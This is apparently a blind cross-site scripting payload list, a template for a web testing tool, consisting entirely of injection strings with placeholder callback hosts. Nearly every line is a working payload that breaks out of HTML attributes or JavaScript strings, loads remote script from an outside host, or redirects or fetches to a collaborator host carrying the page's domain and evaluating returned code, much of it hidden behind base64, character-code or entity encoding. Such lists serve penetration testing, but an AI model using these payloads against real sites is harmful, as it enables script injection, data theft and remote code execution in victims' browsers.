"><script src=!-VARIABLE_XSS_HUNTER-!></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'!-VARIABLE-XSS-HUNTER-!\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=<@base64url>var a=document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";document.body.appendChild(a);<@/base64url> autofocus>
"><img src id=<@base64url>var a=document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";document.body.appendChild(a);<@/base64url> onerror=eval(atob(this.id))>
'><img src id=<@base64url>var a=document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";document.body.appendChild(a);<@/base64url> onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=<@base64url>var a=document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";document.body.appendChild(a);<@/base64url>>
'><video><source onerror=eval(atob(this.id)) id=<@base64url>var a=document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";document.body.appendChild(a);<@/base64url>>
"><iframe srcdoc="<@html_entities><script>var a=parent.document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";parent.document.body.appendChild(a);</script><@/html_entities>">
"><iframe srcdoc="<@html5_entities><script>var a=parent.document.createElement("script");a.src="!-VARIABLE-XSS-HUNTER-!";parent.document.body.appendChild(a);</script><@/html5_entities>">
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;!-VARIABLE-XSS-HUNTER-!&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "!-VARIABLE-XSS-HUNTER-!");a.send();</script>
<script>$.getScript("!-VARIABLE-XSS-HUNTER-!")</script>
<@iframe_data_url>!-VARIABLE-XSS-HUNTER-!<@/iframe_data_url>
<@script_data>!-VARIABLE-XSS-HUNTER-!<@/script_data>
<@uppercase_script>!-VARIABLE-XSS-HUNTER-!<@/uppercase_script>
<@template_eval>!-VARIABLE-XSS-HUNTER-!<@/template_eval>
<@throw_eval>print()<@/throw_eval>
<@datasrc>!-VARIABLE-XSS-HUNTER-!<@/datasrc>
<@behavior>print()<@/behavior>
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
<sCRiPT>document.location='!-VARIABLE_COLLABORATOR-!/?domain='+document.domain</sCRiPT>
<scRiPT>eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))<scRiPT>
<scRiPT>document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain<scRiPT>
<scRipT>fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))</scRiPT>
"-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain-"
'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain-'
"onclick=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>"@x.y
"onclick=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain><svg/onload=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>"@x.y
<image/src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img/src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<image src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<image src =q onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img src =q onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
</scrip</script>t><img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<svg onload=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
"><svg onload=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
"onmouseover=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
"autofocus/onfocus=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain-'
'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
\'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
"><img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
'><img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain
"-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))-"
'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))-'
"onclick=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>"@x.y
"onclick=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<svg/onload=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>"@x.y
<image/src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img/src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<image src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<image src =q onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img src =q onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
</scrip</script>t><img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<svg onload=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
"><svg onload=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
"onmouseover=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
"autofocus/onfocus=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))-'
'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
\'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
"><img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
'><img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))
"-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))-"
'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))-'
"onclick=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>"@x.y
"onclick=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<svg/onload=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>"@x.y
<image/src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img/src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<image src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<image src =q onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img src =q onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
</scrip</script>t><img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<svg onload=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
"><svg onload=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
"onmouseover=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
"autofocus/onfocus=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))-'
'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
\'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
"><img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
'><img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))
jAvAScRipT:location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain
jaVascRIPT:eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))
JaVaSCript:fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))
